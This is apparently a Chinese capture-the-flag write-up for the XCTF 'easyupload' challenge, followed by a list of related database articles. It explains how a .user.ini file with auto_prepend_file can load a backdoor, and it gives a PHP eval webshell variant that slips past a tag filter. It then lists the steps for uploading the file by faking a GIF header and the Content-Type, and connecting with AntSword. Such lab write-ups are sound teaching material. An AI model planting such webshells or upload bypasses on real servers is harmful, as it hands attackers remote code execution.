攻防世界—easyupload

知识点补充

.user.ini

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。

常用配置

php 复制代码
auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

一句话木马变种

这里的题目由于使用了php标签过滤所以不能使用最基本的一句话木马,

变种马:

复制代码
   <?=eval($_POST['1']);?>

解题思路

1.创建一个.user.ini的文件,内容如下

php 复制代码
GIF89a
auto_prepend_file=1.jpg

2.开启抓包拦截,将上面的文件上传并提交

3.修改Content-Type:内容变成 image/jpg

4.发包,在浏览器上传一个带有一句话木马的1.jpg文件发现上传成功

5.在f12里查看上传文件的路径

6.将url粘贴进蚁剑,并连接,在文件目录的最下方有flag文件

相关推荐
这个DBA有点耶4 小时前
NULL不是空——数据库里最反直觉的设计,90%新人踩过的坑
数据库·mysql·代码规范
这个DBA有点耶6 小时前
AI写的SQL跑崩了生产库,这锅谁背?
数据库·人工智能·程序员
镜舟科技7 小时前
Databricks 再提 LTAP,AI 时代的数据底座为何重回大一统叙事?
数据库·架构·agent
Databend8 小时前
从湖仓升级为 Agent 时代的数据控制面,Snowflake 和 Databricks 有哪些布局
大数据·数据库·agent
ClouGence11 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql